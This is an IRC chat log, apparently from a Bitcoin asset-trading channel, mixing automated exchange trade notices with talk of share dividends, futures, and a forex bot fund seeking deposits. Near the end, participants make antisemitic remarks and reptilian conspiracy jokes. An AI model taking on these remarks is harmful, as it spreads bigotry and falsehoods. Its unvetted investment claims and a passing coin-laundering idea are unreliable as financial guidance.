[S.MPOE] 9100 @ 0.00064 = 5.824 BTC [+] Dec 27 15:43:04 [MPEX] [S.MPOE] 7057 @ 0.00064 = 4.5165 BTC [+] Dec 27 16:02:13 [MPEX] [S.MPOE] 6700 @ 0.00064 = 4.288 BTC [+] Dec 27 16:05:16 [MPEX] [S.MPOE] 38800 @ 0.00064 = 24.832 BTC [+] Dec 27 16:17:22 [MPEX] [S.MPOE] 7950 @ 0.00064 = 5.088 BTC [+] Dec 27 16:31:58 [MPEX] [S.MPOE] 12914 @ 0.00064 = 8.265 BTC [+] Dec 27 16:54:58 [MPEX] [S.MPOE] 4149 @ 0.00064 = 2.6554 BTC [+] Dec 27 17:19:51 [MPEX] [S.MPOE] 6262 @ 0.00064 = 4.0077 BTC [+] Dec 27 17:30:14 [MPEX] [S.MPOE] 12300 @ 0.00064 = 7.872 BTC [+] Dec 27 17:46:15 [MPEX] [S.MPOE] 3038 @ 0.00064 = 1.9443 BTC [+] Dec 27 17:49:34 [MPEX] [S.MPOE] 3000 @ 0.00064 = 1.92 BTC [+] Dec 27 17:52:43 [MPEX] [S.MPOE] 8500 @ 0.00064 = 5.44 BTC [+] Dec 27 17:58:01 [MPEX] [S.DICE] 24 @ 0.00358469 = 0.086 BTC [-] Dec 27 18:00:53 ;;ticker Dec 27 18:00:54 BTCUSD ticker | Best bid: 13.28885, Best ask: 13.38625, Bid-ask spread: 0.09740, Last trade: 13.26462, 24 hour volume: 20206.19504333, 24 hour low: 13.20001, 24 hour high: 13.47000, 24 hour vwap: 13.39122 Dec 27 18:01:03 lol Dec 27 18:11:17 [MPEX] [S.MPOE] 7152 @ 0.00064 = 4.5773 BTC [+] Dec 27 18:25:59 ;;ticker Dec 27 18:25:59 BTCUSD ticker | Best bid: 13.38451, Best ask: 13.39286, Bid-ask spread: 0.00835, Last trade: 13.39286, 24 hour volume: 19951.43758602, 24 hour low: 13.20001, 24 hour high: 13.47000, 24 hour vwap: 13.39346 Dec 27 18:30:01 [MPEX] [S.MPOE] 1410 @ 0.00064 = 0.9024 BTC [+] Dec 27 18:39:21 [MPEX] [S.MPOE] 8250 @ 0.00064 = 5.28 BTC [+] Dec 27 18:42:07 [MPEX] [S.MPOE] 5450 @ 0.00064 = 3.488 BTC [+] Dec 27 18:46:52 ;;seen mod6 Dec 27 18:46:52 mod6 was last seen in #bitcoin-assets 5 days, 18 hours, 15 minutes, and 17 seconds ago: \o/ Dec 27 18:47:07 ;;seen smickles Dec 27 18:47:07 smickles was last seen in #bitcoin-assets 13 hours, 54 minutes, and 35 seconds ago: i'll need a mentor! Dec 27 18:52:57 [MPEX] [S.MPOE] 11850 @ 0.00064 = 7.584 BTC [+] Dec 27 18:58:57 DNS: 0.047 sec Dec 27 18:58:57 Connect: 0.072 sec Dec 27 18:58:57 Redirect: 0.000 sec Dec 27 18:58:57 First byte: 0.267 sec Dec 27 18:58:57 Last byte: 0.274 sec Dec 27 18:58:57 Size: 57889 bytes Dec 27 18:59:01 ahaha gotta love good servers. Dec 27 19:05:28 [MPEX] [S.MPOE] 28359 @ 0.00064 = 18.1498 BTC [+] Dec 27 19:09:29 [MPEX] [S.MPOE] 25150 @ 0.00064 = 16.096 BTC [+] Dec 27 19:10:50 mircea, that's more like phat pipe Dec 27 19:18:28 pshhaw Dec 27 19:18:28 http://www.speedtest.net/result/2397718887.png Dec 27 19:18:55 mircea_popescu: you should a BCCAPI server for mod6 and I for mpex users Dec 27 19:19:01 host* Dec 27 19:19:08 mr. phat pipes Dec 27 19:19:23 [MPEX] [S.MPOE] 27350 @ 0.00064 = 17.504 BTC [+] Dec 27 19:19:23 mebbe Dec 27 19:19:58 meanwhile http://polimedia.us/dtng/c/src/135662798517.jpg Dec 27 19:20:06 So if max pain is 13 and change, this should be a good month for MPOE no? Dec 27 19:20:10 and a blockchain :P Dec 27 19:20:10 P Dec 27 19:23:29 Bugpowder o, yeah, it's making money. Dec 27 19:24:34 jurov good servers and phat pipe are one. Dec 27 19:24:55 I assume most of the MPOE holdings are short calls and puts? Dec 27 19:25:12 i think so. Dec 27 19:25:54 Dow under 13k Dec 27 19:25:59 dun dun dun. Dec 27 19:26:05 tank Dec 27 19:26:08 please Dec 27 19:26:16 lol Dec 27 19:26:31 Need to buy more. Dec 27 19:26:37 more dow ? Dec 27 19:27:37 more equities Dec 27 19:27:44 SP500 Dec 27 19:27:59 more everything Dec 27 19:28:04 seems like a waste of time on the long run Dec 27 19:28:12 diversification Dec 27 19:28:16 they'll appreciate forever in meaningless dollars. Dec 27 19:28:20 I cannot predict the future Dec 27 19:28:26 Bugpowder, you trading dow futures in btc somewhere? Dec 27 19:28:41 Uhhh.. I sold all my INDQ futures Dec 27 19:28:51 alreadh Dec 27 19:29:22 the trouble with these BTC futures is that BTC/USD is the primary source of volitility Dec 27 19:29:48 [MPEX] [S.DICE] 1850 @ 0.00355333 = 6.5737 BTC [-] Dec 27 19:30:09 volAtility omg Dec 27 19:30:22 drives me nutssss Dec 27 19:30:26 volatility is good Dec 27 19:30:37 it adds uncertainty Dec 27 19:30:41 isn't anyone trying to arbutrage 1broker.com ? Dec 27 19:30:49 what's 1 broker ? Dec 27 19:30:52 *arbitrage Dec 27 19:30:59 buttrage Dec 27 19:31:11 btc futures trading, done by some austrian student Dec 27 19:31:23 how is the volume? Dec 27 19:31:58 17:30 < mircea_popescu> volAtility omg <<< lil Dec 27 19:32:04 er, sry, LOL Dec 27 19:32:04 hhaha Dec 27 19:32:16 lil mircea Dec 27 19:32:24 you are all trolling me I KNEW IT Dec 27 19:32:52 [MPEX] [S.MPOE] 14000 @ 0.00064 = 8.96 BTC [+] Dec 27 19:33:22 hard to say.. maybe it's like kakobrekla's forex thing Dec 27 19:33:48 how the f has this been the lead story on yahoo finance all morning Dec 27 19:33:48 http://finance.yahoo.com/blogs/daily-ticker/apple-lot-tricks-sleeve-2013-david-kirkpatrick-140333147.html Dec 27 19:34:09 One analyst saying. watch out! they have tricks of their sleeve! Dec 27 19:38:22 i just looked and there's no dow on mpex ? Dec 27 19:38:40 Bugpowder prolly cost like 500 bux. Dec 27 19:40:07 [MPEX] [S.MPOE] 6200 @ 0.00064 = 3.968 BTC [+] Dec 27 19:40:15 hello Dec 27 19:40:20 heya Dec 27 19:43:30 ;;bc,24hprc Dec 27 19:43:32 13.35 Dec 27 19:54:02 [MPEX] [S.MPOE] 4904 @ 0.00064 = 3.1386 BTC [+] Dec 27 20:00:14 [MPEX] [S.MPOE] 27050 @ 0.00064 = 17.312 BTC [+] Dec 27 20:02:23 can someone help me interpret what this guys is saying -> https://bitcointalk.org/index.php?topic=132008.msg1422310#msg1422310 Dec 27 20:02:35 he's not making much sense Dec 27 20:03:15 well it's from bitcointalk.org first of all Dec 27 20:03:20 so tread lightly Dec 27 20:04:15 it's pretty clear gigavps Dec 27 20:04:30 lol Dec 27 20:04:32 you started talking about virgins and now everyone thinks you are a muslim Dec 27 20:04:47 coming soon: scammer terrorist tag Dec 27 20:05:16 lol Dec 27 20:05:27 i just want to know if ppl like vigin coins Dec 27 20:05:41 before i go sink 200+ hours into development Dec 27 20:05:57 but i guess i attract all of the crazies Dec 27 20:06:14 true dat homie Dec 27 20:06:15 lol virgin Dec 27 20:06:21 time for gigavps-sock account Dec 27 20:06:35 i have my first employee starting on Jan 2 Dec 27 20:06:51 i hope it's a she Dec 27 20:06:57 and she's mildly attractive Dec 27 20:07:07 and she really tells everyone to fuck off on the forum Dec 27 20:07:09 well, my wife is on the payroll Dec 27 20:07:11 [MPEX] [S.MPOE] 5900 @ 0.00064 = 3.776 BTC [+] Dec 27 20:07:12 i don't get whole thing... you want to launder coins by means of own mining pool? Dec 27 20:07:16 at the expense of looking credible herself Dec 27 20:07:16 but she doesn't do anything with the business Dec 27 20:07:44 of course nothing like that currently exists Dec 27 20:07:52 :) Dec 27 20:07:54 as in, ppl send txs with large fees exclusively to you, then when you mine a block, lo and behold, virgins Dec 27 20:08:02 ? Dec 27 20:08:08 something like that Dec 27 20:08:16 you can also mine coins directly to paper wallets Dec 27 20:08:32 so the private keys can be mailed to ppl Dec 27 20:08:35 that'd be wild Dec 27 20:08:42 it's coming Dec 27 20:08:45 especially if it relied on like a print command that failed Dec 27 20:08:58 or the printer jammed Dec 27 20:09:03 and the coins were lost Dec 27 20:09:04 paper wallets would be printed BEFORE HAND Dec 27 20:09:14 stored in a safe Dec 27 20:09:19 all that good stuff Dec 27 20:09:38 nah i say mine blocks directly to line feed printer Dec 27 20:09:39 so sending block fees to an addy requires its private key? Dec 27 20:09:41 no backups Dec 27 20:10:07 jurov no Dec 27 20:10:22 mining pools can use "tracker" addresses Dec 27 20:10:42 or like eligius, mine a portion of coins directly to a wallet Dec 27 20:10:46 [MPEX] [S.MPOE] 3100 @ 0.00064 = 1.984 BTC [+] Dec 27 20:11:02 gigavps, then no mailing necessary... ppl just send securely the txs with oversized fees, get back virgins to source address Dec 27 20:12:32 that is a possiblity if you are only accepting coins in payment Dec 27 20:12:52 but what if you want to accept bank wire, cc, etc Dec 27 20:13:11 you need to follow meatspace rulz Dec 27 20:13:27 aka, mailing something to a verified address Dec 27 20:15:15 um i don't get it... accepting bank wire/cc anonymously looks like much bigger hurdle than transferring private keys securely Dec 27 20:18:09 well, accepting meatspace wouldn't be annon Dec 27 20:18:47 actually it is has the same risks as sending cash by mail... except that receiver won't be aware someone copied the key en route Dec 27 20:20:47 and blaming everything on you Dec 27 20:20:51 jurov Dec 27 20:20:58 the broker Dec 27 20:21:24 yes? Dec 27 20:25:02 ooo, just made post 2100 to smack SAC upside the head Dec 27 20:25:12 https://bitcointalk.org/index.php?topic=132008.msg1422352#msg1422352 Dec 27 20:25:24 i guess his rage is confusing him Dec 27 20:26:15 sac, the block purity protector Dec 27 20:34:55 did i make it better? Dec 27 20:35:18 [MPEX] [S.MPOE] 13247 @ 0.00064 = 8.4781 BTC [+] Dec 27 20:36:57 [MPEX] [S.MPOE] 5950 @ 0.00064 = 3.808 BTC [+] Dec 27 20:42:25 [MPEX] [S.MPOE] 2346 @ 0.00064 = 1.5014 BTC [+] Dec 27 20:45:06 depressing irssi is hard to use in a mac Dec 27 20:45:08 no alt key Dec 27 20:45:13 just option :P Dec 27 20:46:41 [MPEX] [S.MPOE] 7091 @ 0.00064 = 4.5382 BTC [+] Dec 27 20:52:12 fn-option Dec 27 20:52:16 = alt Dec 27 21:00:23 [MPEX] [S.MPOE] 7350 @ 0.00064 = 4.704 BTC [+] Dec 27 21:04:14 4¢£ Dec 27 21:04:15 nope Dec 27 21:04:25 just makes symbols doesn't change windows Dec 27 21:05:39 hey whats up Dec 27 21:07:48 . Dec 27 21:20:21 [MPEX] [S.MPOE] 11050 @ 0.00064 = 7.072 BTC [+] Dec 27 21:21:18 http://trilema.com/2012/mpex-futures-december-2012-settlement/ Dec 27 21:21:20 futures settled. Dec 27 21:22:23 im just wrappin up math of my kv1 fund, up 20.6% after the fees in first month Dec 27 21:22:36 oh cool :) Dec 27 21:23:02 [MPEX] [S.DICE] 1300 @ 0.00354228 = 4.605 BTC [-] Dec 27 21:23:04 [MPEX] [S.DICE] 1500 @ 0.00352003 = 5.28 BTC [-] Dec 27 21:23:52 bah the list's not right Dec 27 21:25:15 ?? Dec 27 21:26:12 badly formatted. fixed nao. Dec 27 21:26:39 kakobrekla what's a kv1 fund ? Dec 27 21:26:51 my money making machine Dec 27 21:26:53 I had X.INDQ's value at .1943 Dec 27 21:27:12 hmm, mircea_popescu does this mean you'll publish the options maturity number too ? Dec 27 21:27:26 smickles i already am ? Dec 27 21:27:37 the usd/btc rate at expiry? Dec 27 21:27:57 Or have I just not know where you put it this whole time Dec 27 21:27:58 in that case, define "this" Dec 27 21:28:27 dioes the fact that i publish btc settlement values for futures mean that i will also publish btc settlement values for options ? yes, it does. Dec 27 21:28:31 and yes, i already am. Dec 27 21:28:36 "this" being the fact that you published unrelated information of the futures :P Dec 27 21:28:45 lol Dec 27 21:30:20 but i thought what you meant was, volumes, as in "x contracts" Dec 27 21:30:56 which, you know, "Total 114763 of which Call, -20011 +20338 Put" Dec 27 21:31:15 yeah, I know that Dec 27 21:31:57 what I'm curious about was what you read from bitcoincharts as the average at maturity Dec 27 21:32:12 it's a pain to look that up retrospectively Dec 27 21:32:57 "2. A better reset is this un-documented procedure, used by beta tester ( I was on the FVS338). Is hold the reset button for 20 sec, pull the power while still holding the reset button for 20 sec, then power up still holding the reset for 20 sec. Then release the reset button." Dec 27 21:33:09 lol. any sufficently advanced technology will be treated as magic. Dec 27 21:34:31 lol Dec 27 21:35:05 the quest for the better reset. Dec 27 21:35:26 "undocumented magic" sound like something illegal in 'merica Dec 27 21:36:43 sounds like eleves working in your basement as slaves who are also illegally ommigrated Dec 27 21:36:48 immigrated Dec 27 21:37:46 damn, I wish I measured the temp which i brewed this coffee at :/ Dec 27 21:37:58 it tastes so much better today Dec 27 21:42:01 [MPEX] [S.MPOE] 5000 @ 0.00064 = 3.2 BTC [+] Dec 27 21:44:36 [MPEX] [S.MPOE] 8865 @ 0.00064 = 5.6736 BTC [+] Dec 27 21:46:27 kakobrekla, 15 euro profit. NOICE. Dec 27 21:46:50 btc Dec 27 21:47:40 stupid SP500 bouncing Dec 27 21:47:48 its btc Buglouse Dec 27 21:47:49 eh Buglouse Dec 27 21:47:52 fuckkk Dec 27 21:47:54 Bugpowder Dec 27 21:48:00 lol Dec 27 21:48:28 anyway 20.6 is going out Dec 27 21:48:30 bah my interet has been horrible all day. Dec 27 21:48:31 5 are fees Dec 27 21:48:35 new 100 comming in Dec 27 21:48:44 so 20.6 profit for clients Dec 27 21:48:44 dumbass romanians only getting online to download xmas greetings. Dec 27 21:49:12 lol, we shouldn't trade futures between ourselves.. we'll get to hate each other Dec 27 21:49:32 What is your general strategy? Dec 27 21:50:06 I follow JP_Jackson's strategy Dec 27 21:50:19 "Hold on to your butts." Dec 27 21:50:44 you are asking me? Dec 27 21:51:07 yes Dec 27 21:52:09 i write bots with enky, kv1 is the first prototype, it uses kalman filtered velocity as a main indicator Dec 27 21:52:43 new ones commin out as soon as i get rid of mp breating behind my back ;> Dec 27 21:53:23 trading what? Dec 27 21:53:47 what do you mean what, forex pairs Dec 27 21:54:02 which pairs? Dec 27 21:54:50 audnzd cadjpy gbpjpy eurusd at the moment Dec 27 21:55:19 ok. So where do bitcoins come into play? Dec 27 21:55:42 forex account is denominated in bitcoin Dec 27 21:55:51 so are profits and losses Dec 27 21:56:10 what forex place has that option? Dec 27 21:56:17 me Dec 27 21:57:34 Do you have to exchange to fiat and back to trade the pairs?? Dec 27 21:57:53 no, bit4x.com Dec 27 21:58:01 read Dec 27 21:59:30 whats the spread? Dec 27 21:59:38 3 on majors Dec 27 21:59:47 3 pips? Dec 27 21:59:57 no other fees, no swap, no tax no nothing Dec 27 21:59:59 ya Dec 27 22:00:31 you can get institutional acc with 500btc+ with a fraction of that spread but some other fees come into play there Dec 27 22:00:47 if you dont scalp its better this way Dec 27 22:01:19 cool Dec 27 22:04:10 Can people buy in to KV1? Dec 27 22:05:11 kakobrekla what is the fee structure for kv1? what is the leverage used? Dec 27 22:06:27 This should clear automatically in 2-3 business days in most cases. We apologize for any inconvenience." for almost 2 weeks now. Dec 27 22:06:38 weird Dec 27 22:06:50 on gox? Dec 27 22:07:00 i bet .5 btc Dec 27 22:07:08 in favor of it being gox Dec 27 22:07:34 campbx.com Dec 27 22:07:44 smickles: I'll take your .5 btc :) Dec 27 22:09:00 heh, i'm glad noone actually took the bet. pizzaman1337 I should hope you'd recuse yourself from betting, as it was you who had the answer ;) Dec 27 22:09:20 yeah, slightly unfair... Dec 27 22:09:23 Bugpowder, 1:500 but that high its not needed, theres max of 0.4 lots that it can open with 4 pairs now so it wont overtrade, fee is 20% of the profits because its a highly maintained system (closing trades are mostly manualy) Dec 27 22:11:16 what about losing months, is there a fee? Are previous month's losses subtracted from subsequent month's gains prior to calculating the performance fee? Dec 27 22:12:41 betting is an interesting way of outting the baysian mind. if you are 100% sure of something, then you should have absolutely no issue betting 100% of your money, in fact, you should have no issue doing that and borrowing more to bet as well. Point being, people tend to say (and self deludedly believe) they are 100% sure of something, yet would hesitate to risk all they own on a bet to that end Dec 27 22:13:33 fees are only on profits, for now profits are paid out monthly, after a few months we will go with a closed fund probably, paying out monthly profits is not a wise idea in the first place but with much fluctuation now i dont have much choice Dec 27 22:16:33 [MPEX] [O.BTCUSD.C130T] 1 @ 0.03464639 BTC [-] Dec 27 22:18:40 [MPEX] [S.MPOE] 3550 @ 0.00064 = 2.272 BTC [+] Dec 27 22:19:01 ;;bc,24hprc Dec 27 22:19:03 13.36 Dec 27 22:20:47 ;;ticker Dec 27 22:20:48 BTCUSD ticker | Best bid: 13.39889, Best ask: 13.39970, Bid-ask spread: 0.00081, Last trade: 13.39888, 24 hour volume: 20296.08468303, 24 hour low: 13.26355, 24 hour high: 13.47000, 24 hour vwap: 13.40203 Dec 27 22:21:22 that C130T seems downright ballsy to me Dec 27 22:21:48 if i'm correct, it breaks even at 13.475~ Dec 27 22:21:56 *13.465! Dec 27 22:22:19 kakobrekla Well.... 7 trades total? If your performance keeps up I may be interested. Dec 27 22:22:27 we could see a 10 cent move in a day Dec 27 22:22:47 and today's high on bitcoincharts shows 13.47 at that! Dec 27 22:22:53 ya, first was a bug :) Dec 27 22:23:25 then one was bad, and one was 0 cause we got cold feet, it would end up +20 Dec 27 22:23:57 "we got cold feet" who is pulling the trigger, the software or a person? Dec 27 22:24:17 exits are semi automated / controlled Dec 27 22:24:44 it will exit on its own Dec 27 22:24:49 but we prefer to manage it Dec 27 22:25:09 anyway, this is only the first version Dec 27 22:25:35 about a year of cpu time went in it Dec 27 22:26:12 but not i have mt5 could set up Dec 27 22:26:31 a result that would take a year before takes an hour now Dec 27 22:26:38 a year to get Dec 27 22:27:26 but shit need to be recoded then for mt4 unfortanetly :) Dec 27 22:28:59 anyway its tested on 4 years backtest or so Dec 27 22:29:01 the kv1 Dec 27 22:29:04 didnt blow Dec 27 22:29:13 had periods when it made little to nothing Dec 27 22:29:17 and then had good periods Dec 27 22:29:32 how do you backtest if a human pulls the trigger? Dec 27 22:29:43 w/o human ofc. Dec 27 22:30:02 yes the result will be different Dec 27 22:30:07 but Dec 27 22:30:07 right, but if you have a human pulling the trigger in the real implementation the backtest is not valide Dec 27 22:30:08 yeah Dec 27 22:30:09 it will be different in any case Dec 27 22:30:14 sure Dec 27 22:30:17 backtest doestn mean that much Dec 27 22:30:23 but it can tell you something. Dec 27 22:30:24 i agree Dec 27 22:30:38 i mean Dec 27 22:30:46 if i have a bot that will burn in 4 years Dec 27 22:30:50 of backtest Dec 27 22:30:57 i wont put in live not in a dream Dec 27 22:31:01 even if its perfect for 1year Dec 27 22:31:12 well i gues it would depends on amount of trading Dec 27 22:31:21 at least 100 trades, rather 500 Dec 27 22:31:24 to evaluate Dec 27 22:31:38 yeah.... Dec 27 22:31:44 but you need time too Dec 27 22:31:55 market dynamics shift over many lengthscales Dec 27 22:32:35 if it will get through 4 years i dont expect it to blow in a month Dec 27 22:32:46 it might Dec 27 22:32:50 but it shouldnt Dec 27 22:32:56 :) Dec 27 22:33:12 would be nice to see how it handles 07-08 Dec 27 22:34:29 i could run a test if you are really that interested Dec 27 22:35:47 i guess at this point is best enky speaks as well. Dec 27 22:36:49 well let's defer this for a bit. Need to get back to wrok Dec 27 22:37:00 will be watching with interest though Dec 27 22:37:26 [MPEX] [S.MPOE] 3300 @ 0.00064 = 2.112 BTC [+] Dec 27 22:37:36 heh, it's probably interesting to see how any bot handles 07-08 Dec 27 22:39:35 kakobrekla: you should test your bot on usd/gbp years 29-30 Dec 27 22:40:26 cant Dec 27 22:40:50 damn, is there really no data from back then? Dec 27 22:41:09 well, not in a useful form Dec 27 22:41:43 too bad, that would be fun Dec 27 22:44:25 Nasdaq green Dec 27 22:44:27 wtf Dec 27 22:44:38 "Stocks Pare Losses as House to Reconvene Sunday" Dec 27 22:44:48 ugh Dec 27 22:45:49 why, were you shorting? Dec 27 22:45:53 no Dec 27 22:45:57 I wanted to buy Dec 27 22:46:15 but can only at EOD price Dec 27 22:46:21 guess I will keep waiting Dec 27 22:46:31 why only at EOD? Dec 27 22:47:16 haha Dec 27 22:47:16 Vanguard exchange from MM to fund Dec 27 22:47:18 everyone that shorted Dec 27 22:47:25 got fucked Dec 27 22:47:51 hope you got enough for more than intraday holding Dec 27 22:48:32 I never sell. Dec 27 22:48:42 lol he's the bughole of stocks Dec 27 22:48:44 only buys Dec 27 22:48:50 are you long or short Dec 27 22:49:07 wait what Dec 27 22:49:10 long Dec 27 22:49:17 what are you in Dec 27 22:50:02 I'm still tapping the jpy atm.. but getting out tmrw afternoon and taking gains Dec 27 22:50:05 [MPEX] [S.MPOE] 5950 @ 0.00064 = 3.808 BTC [+] Dec 27 22:50:06 fecal cliff wont steal my monies Dec 27 22:50:07 VOO (ETF); VFIAX (admiralty) VVIAX (admiralty) VBF (ETF); VISVX (regular); no exact admiralty VGPMX (regular); no admiralty VGENX (regular); VGELX (admiralty 100K) VGSIX (regular); VGSLX (admiralty) VWO (ETF); VEMAX (admiralty) VTIAX (admiralty) VTRIX (regular); no admiralty VWITX (regular); VWIUX (admiralty) VBIIX (regular); VBILX (admiralty) VIPSX (regular); VAIPX (admiralty for 50k) VBLTX (regular); no adm; VWLTX ( Dec 27 22:50:42 at various percentages Dec 27 22:50:51 nice Dec 27 22:51:18 Also S.DICE Dec 27 22:51:20 :) Dec 27 22:51:31 I'm shuttin down my EUR/JPY positions and thinking of going long EUR/USD as a fecal cliff play Dec 27 22:51:39 short S.DICE Dec 27 22:51:47 why, why? Dec 27 22:52:13 the newly elected people in Japan got in, made their announcements Dec 27 22:52:16 ls Dec 27 22:52:17 there was a nice move Dec 27 22:52:19 they set a target Dec 27 22:52:21 lllllllllp Dec 27 22:52:28 but they don't get into office to actually set policy Dec 27 22:52:33 until next month Dec 27 22:52:37 people are manipulation S.DICE Dec 27 22:52:45 or someone is Dec 27 22:52:53 bonafide, i see Dec 27 22:52:57 either people or someone. Dec 27 22:53:00 thestringpuller what is the evidence? Dec 27 22:53:05 of manipulation? Dec 27 22:53:22 I could stay long, but I like taking nice gains and reposition on the pullback Dec 27 22:54:02 I dont have many equities Dec 27 22:54:07 just JPM, GOOG and DHI Dec 27 22:54:25 buy orders for TI, SODA Dec 27 22:54:37 ;;getrating bonafide Dec 27 22:54:38 This user has not yet been rated. WARNING: Currently not authenticated. Dec 27 22:54:52 buy some wot. Dec 27 22:55:39 getrating? Dec 27 22:55:59 I like MARV here Dec 27 22:56:14 I think the verdict will be reduced Dec 27 22:56:32 sorry MRVL Dec 27 22:56:35 marv? Dec 27 22:56:36 oh okay Dec 27 22:57:16 who's their biggest contracts Dec 27 22:57:16 RIMM Dec 27 22:57:16 unfortunately Dec 27 22:57:22 and all the HDD makers Dec 27 22:57:30 MRVL is QCOM's direct competitor? Dec 27 22:57:44 not sure Dec 27 22:58:07 I've been looking for a food equity Dec 27 22:58:12 thinking ADM Dec 27 22:58:15 bad idea, obama is jesus, so nothing bad will happen to usd Dec 27 22:58:30 Obama does nothing for the dollar Dec 27 22:58:40 right now its a race between USD and JPY Dec 27 22:58:44 who can devalue faster Dec 27 22:58:57 mircea_popescu: buy WoT? Dec 27 22:59:15 wot = web of trust in here Dec 27 22:59:25 i know Dec 27 22:59:29 but buying it? Dec 27 22:59:36 we buy trust now? Dec 27 22:59:43 ya, 5btc a pop Dec 27 22:59:52 really? Dec 27 23:00:04 sure, 5btc will get you -10 Dec 27 23:00:04 10 btc for you Dec 27 23:00:11 thestringpuller: actually, 1F1dPZxdxVVigpGdsafnZ3cFBdMGDADFDe Dec 27 23:00:12 lol Dec 27 23:00:12 lol Dec 27 23:00:26 send btc there, it will help the wot Dec 27 23:00:27 I'm not paying for "wot" Dec 27 23:00:34 it's not like I'm putting your money in harms way Dec 27 23:00:54 lol Dec 27 23:00:55 http://blockchain.info/address/1F1dPZxdxVVigpGdsafnZ3cFBdMGDADFDe Dec 27 23:01:18 it helps pay for the costs of running the wot Dec 27 23:01:25 also, dev on v2 of the protocol Dec 27 23:02:11 [MPEX] [S.MPOE] 1063 @ 0.00064 = 0.6803 BTC [+] Dec 27 23:02:18 actually send to 1TBZjmXho6mdGhoESaMV2svtqJXYtWfEp Dec 27 23:02:33 welp.. that news conference Dec 27 23:02:35 was pointless Dec 27 23:02:41 pigeons actually prefer meat Dec 27 23:02:57 fuckin breadcrumbs again Dec 27 23:03:18 I saw something on American Greed where some guy conned multi-millions from people by pitching the ideas that pigeons would soon replace chicken Dec 27 23:03:22 lollll Dec 27 23:03:47 lol, nice con Dec 27 23:04:08 actually the native species of pigeon to north america went extinct cause it was overhunted overeaten, then when it was gone people settled for chicken Dec 27 23:04:24 flying rat (super powers) vs incapacitated bird (lame) Dec 27 23:04:31 id take pigeon. Dec 27 23:04:55 pigeons: so what pigeons do we have now? Dec 27 23:05:51 rock pigeon Dec 27 23:05:57 http://en.wikipedia.org/wiki/Passenger_Pigeon Dec 27 23:06:52 the "pigeons" now in north america are escaped pet rock doves from europe Dec 27 23:07:45 they're fucking annoying Dec 27 23:07:54 they love mcdonalds Dec 27 23:08:12 A&P supermarket had a contest and the winner geneticly modified the hen to not have bloody meat so the jewish customers would eat it Dec 27 23:08:18 and that is what we eat today Dec 27 23:08:44 as "chicken" Dec 27 23:08:47 The jews always have their hands in everything Dec 27 23:08:56 jews/aliens/gays Dec 27 23:09:07 FUCK Dec 27 23:09:12 Kosher Coke is good tho Dec 27 23:09:19 but that's just the real formula Dec 27 23:09:55 nap time Dec 27 23:11:12 [MPEX] [S.MPOE] 11550 @ 0.00064 = 7.392 BTC [+] Dec 27 23:12:16 [MPEX] [S.MPOE] 7200 @ 0.00064 = 4.608 BTC [+] Dec 27 23:15:31 [MPEX] [S.MPOE] 11800 @ 0.00064 = 7.552 BTC [+] Dec 27 23:15:38 < pigeons> jews/aliens/gays < they're all reptoids anyway :| Dec 27 23:16:56 i meant the aryans that control the greys Dec 27 23:17:58 ;;google hillary clinton reptile eyes youtube Dec 27 23:17:59 Hillary Clinton with Reptilian Eyes - YouTube: ; Hillary Clinton Reptilian Eye - On Her Official Photo! - YouTube: ; Hillary Clinton reptilian eye on plasma TV by ljrow49 - YouTube: Dec 27 23:18:57 [MPEX] [S.MPOE] 175000 @ 0.00064 = 112 BTC [+] Dec 27 23:23:01 [MPEX] [S.MPOE] 2050 @ 0.00064 = 1.312 BTC [+] Dec 27 23:28:52 ;;ticker Dec 27 23:28:53 BTCUSD ticker | Best bid: 13.41660, Best ask: 13.42967, Bid-ask spread: 0.01307, Last trade: 13.42967, 24 hour volume: 21857.94329942, 24 hour low: 13.25000, 24 hour high: 13.47000, 24 hour vwap: 13.39289 Dec 27 23:30:26 So who wants to bet on the S.MPOE dividend Dec 27 23:30:28 ? Dec 27 23:30:44 [MPEX] [S.MPOE] 35550 @ 0.00064 = 22.752 BTC [+] Dec 27 23:30:48 Do we know the yield on the MPOE bonds this month? Dec 27 23:33:03 19% Dec 27 23:34:53 [MPEX] [S.MPOE] 25900 @ 0.00064 = 16.576 BTC [+] Dec 27 23:36:10 jurov: I bet it's higher Dec 27 23:36:37 so you did pull these 25% this month? Dec 27 23:36:51 these? Dec 27 23:37:18 i remember you making some mpbor-related threats to mircea Dec 27 23:37:28 oh and if anyone else is interested, kv1 is open for deposits till the 31st, 100btc min Dec 27 23:37:31 lol, threats Dec 27 23:37:38 :D Dec 27 23:40:59 [MPEX] [S.MPOE] 3400 @ 0.00064 = 2.176 BTC [+] Dec 27 23:42:03 anyway such bonds return could cause some last-minute rush for MPBPT. would be nice. Dec 27 23:43:04 what do you really think the bond rate will be? Dec 27 23:43:09 25% Dec 27 23:43:49 well, unless the capital requirement is low this month Dec 27 23:44:43 also, anyone whant to short s.mpoe? Dec 27 23:45:16 ;D Dec 27 23:45:40 it wont have shorting conditions until late january Dec 27 23:46:13 thestringpuller: suppose people are buying it now expecting a large dividend, then receive next to nothing b/c the bondholders took it all Dec 27 23:46:13 dec will be a good month for mpoe Dec 27 23:46:32 what was bondholder auction? Dec 27 23:46:44 i though last month was 9% Dec 27 23:46:47 it's not released until settlement of the options Dec 27 23:46:57 and that will be in 14hours Dec 27 23:46:58 yeah, last month was 9% Dec 27 23:47:11 mpoe only made 6% in november Dec 27 23:47:23 with a request of 9% Dec 27 23:47:30 well 110,000 contracts traded this month Dec 27 23:47:33 similar to Nov Dec 27 23:47:58 smickles: shareholders didnt get any reql dividends in nob Dec 27 23:48:00 do you think there has been an increase in the amount of btc from the bondholders this month? Dec 27 23:48:01 nov* Dec 27 23:48:12 real* Dec 27 23:48:20 thestringpuller: shhh, you're giving people knowledge :P Dec 27 23:48:30 smickles, i seriously consider lending some s.mpoe tomorrow, will you be there? Dec 27 23:48:51 jurov: you mean borrowing? Dec 27 23:49:01 yes borrowing Dec 27 23:49:22 about how much ?, I'm not entirely a big fish yet Dec 27 23:49:34 btc 27 worth Dec 27 23:49:58 ;;calc 27/ 0.00064 Dec 27 23:49:58 I think I could do that, my terms are 0.2% per day, one interest payment minimum Dec 27 23:49:59 42187.5 Dec 27 23:50:35 okay. we'll see tomorrow Dec 27 23:50:40 *plot thickens* Dec 27 23:50:43 about what time UTC? Dec 27 23:50:48 I'll be sure to be on Dec 27 23:50:50 any time Dec 27 23:51:05 i'll be most of the day, best evening UTC Dec 27 23:51:54 kk, I'm usually on at several points in the day any way, I'll make my presence known :) Dec 27 23:52:18 btw, what about the dividends? Dec 27 23:52:29 should i return them to you? Dec 27 23:53:58 [MPEX] [S.MPOE] 5350 @ 0.00064 = 3.424 BTC [+] Dec 27 23:54:40 and do you want interest every day or in the end? Dec 27 